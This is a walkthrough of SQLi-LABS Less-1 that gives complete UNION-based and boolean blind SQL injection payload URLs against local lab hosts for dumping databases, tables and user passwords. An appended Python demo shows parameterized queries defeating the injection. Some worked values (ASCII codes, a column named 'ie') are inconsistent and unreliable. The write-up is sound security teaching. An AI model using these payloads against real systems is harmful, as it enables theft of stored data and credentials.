SQLi-LABS Page-1 (Basic Challenges)
Entering ?id=1 executes normally.
![image.png](https://i-blog.csdnimg.cn/blog_migrate/109bec709abdf55aad09fc11f27d54a5.png)
Append a single quote ' and an error appears: the original '1' becomes '1'', the last two single quotes pair up with each other, and the statement fails.
Understanding: ?id=1 and 1=2
The page still echoes correctly, which shows this is a string-type injection.
Telling string-type injection apart from numeric-type injection
- If, in a GET request, neither ?id=1 and 1=1 nor ?id=1 and 1=2 produces an error, it is string-type injection.
- If ?id=1 and 1=1 produces no error but ?id=1 and 1=2 raises an exception or returns no echo, it is numeric-type injection.
Proof:
1. If ?id=1 and 1=2 is injected, the query in the database is:
select * from user where id='1 and 1=2';
Because id is an int column, the value '1 and 1=2' is implicitly cast to '1', so the query the database finally runs is:
select * from user where id='1';
The SQL statement therefore does not error, which is why this is string-type injection.
Type coercion:
If it were numeric-type injection, injecting ?id=1 and 1=2 would give the SQL statement:
select * from user where id=1 and 1=2
Because select * from users where id=1 is a valid statement and the 1=2 after and is false, select * from users where id=1 and 1=2 raises an exception or the page shows no echo.
Constructing parameters for string-type injection:
1 and 1=1
SQL statement: select name from users where id='1 and 1=1'
1' and '1'='1
SQL statement: select name from users where id='1' and '1'='1'
1' and 1=1 # (# is URL-encoded as %23), or --+
SQL statement: select name from users where id='1' and 1=1 #'
1' and 1=2 # (%23)
SQL statement: select name from users where id='1' and 1=2 #'
LESS-1
GET error-based injection
Dump the databases:
http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata--+
The SQL statement at this point is
SELECT * FROM users WHERE id='-1'union select 1,group_concat(schema_name),3 from information_schema.schemata--+ LIMIT 0,1
Dump the tables of the security database
http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27--+
The SQL statement at this point is
SELECT * FROM users WHERE id='-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+ LIMIT 0,1
Dump the columns of the users table
http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27--+
The SQL statement at this point is
SELECT * FROM users WHERE id='-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ LIMIT 0,1
Dump the data
http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,username,password%20from%20users%20where%20id=4--+
The SQL statement at this point is
SELECT * FROM users WHERE id='-1'union select 1,username,password from users where id=4 --+ LIMIT 0,1
GET blind injection
Prerequisite SQL basics
length('name'): returns the length of the string
substr('name',1,1): extracts a substring
ascii('a'): returns the ASCII code of the character
left('name',2): returns the leftmost two characters of name
right('name',2): returns the rightmost two characters of name
Principle
If the SQL statement executes correctly the page returns one kind of page; if the SQL statement fails, a different page is served. The difference between the two pages tells you whether the SQL statement succeeded, and that is how the data is retrieved.
Steps
- Get the length of the current database name
http://192.168.220.130/sqlilabs/Less-1/?id=1' and length(database())=8 --+
Then brute-force the 8 with Burp.
- Get the current database name
Brute-force the 1 and the 115 with Burp (the character position and its ASCII value)
http://192.168.220.130/sqlilabs/Less-1/?id=1' and ascii(substr(database(),1,1))=115 --+
- Get the total number of tables in the current database
http://192.168.220.130/sqlilabs/Less-1/?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=4 --+
- Get the length of each table name
Brute-force the 0 and the 6 with Burp (the limit offset and the length)
Length of the first table name
http://192.168.220.130/sqlilabs/Less-1/?id=1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=6--+
Length of the second table name
http://192.168.220.130/sqlilabs/Less-1/?id=1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)=8--+
- Get the table names
First table name: emails
http://192.168.220.130/sqlilabs/Less-1/?id=1' and ascii(mid((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))=101 --+
http://192.168.220.130/sqlilabs/Less-1/?id=1' and ascii(mid((select table_name from information_schema.tables where table_schema = database() limit 0,1),2,1))=109 --+
Second table name: referers
http://192.168.220.130/sqlilabs/Less-1/?id=1' and ascii(mid((select table_name from information_schema.tables where table_schema = database() limit 1,1),1,1))=109 --+
All table names obtained: emails,referers,uagents,users
- Get the total number of columns in a table
http://192.168.220.130/sqlilabs/Less-1/?id=1' and (select count(column_name) from information_schema.columns where table_name='emails' and table_schema=database())=2 --+
http://192.168.220.130/sqlilabs/Less-1/?id=1' and (select count(column_name) from information_schema.columns where table_name='users' and table_schema=database())=3 --+
- Get the column name lengths
http://192.168.220.130/sqlilabs/Less-1/?id=1' and (select length(column_name) from information_schema.columns where table_name='emails' and table_schema=database() limit 0,1)=2 --+
- Get the column names
1' and ascii(substr((select column_name from information_schema.columns where table_name='emails' and table_schema=database() limit 0,1),1,1))=101 --+
The column name is determined to be ie
- Get the column contents
http://192.168.220.130/sqlilabs/Less-1/?id=1' and ascii(substr((select concat(id,email_id) from emails limit 0,1),1,1))=49 --+
Matching against the ASCII table, the field content is 12345678
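The three page behaviours this writeup keys on (a row comes back, no echo, SQL error) for the string-type probes, the union payload and the blind probes above, and why all of them collapse to "no echo" once the id is bound as a parameter, as an added example that is not part of the original post. It uses Python's sqlite3 with a constructed users table as a stand-in for the lab's MySQL database, so MySQL-specific details such as the implicit cast of '1 and 1=2' to 1 are not reproduced.

```python
import sqlite3

# Constructed sample rows standing in for the lab's users table (not the lab's data).
SAMPLE_USERS = [(1, "alice", "pw-alice"), (2, "bob", "pw-bob"), (4, "dave", "pw-dave")]


def make_db():
    """In-memory SQLite database with the same three-column shape the lab queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """The lab's pattern: the raw ?id= value is pasted between single quotes."""
    sql = "SELECT * FROM users WHERE id='" + user_id + "' LIMIT 0,1"
    return conn.execute(sql).fetchone()


def lookup_safe(conn, user_id):
    """Hardened form: the value is bound as one parameter and can never become SQL."""
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchone()


def observe(lookup, conn, user_id):
    """Reduce one request to the three outcomes the blind technique relies on."""
    try:
        row = lookup(conn, user_id)
    except sqlite3.Error:
        return "error"                      # the page's "reports an error" case
    return "row" if row else "empty"        # "echoes" versus "no echo"


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1'", "1' and 1=1 --", "1' and 1=2 --",
                  "-1' union select 1,'injected','row' --"):
        print(f"{probe!r:45} vulnerable={observe(lookup_vulnerable, db, probe):5} "
              f"safe={observe(lookup_safe, db, probe)}")
```

With the concatenated query the true/false probes flip between "row" and "empty" and the union payload returns the injected row, exactly the signal the writeup reads; with the bound parameter every probe is "empty" because the whole string is compared against the integer id and never parsed as SQL.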
A bug in Burp Suite:
Clicking Start attack shows "Invalid number settings", because Burp has a bug.
Workaround: click hex below, then click decimal.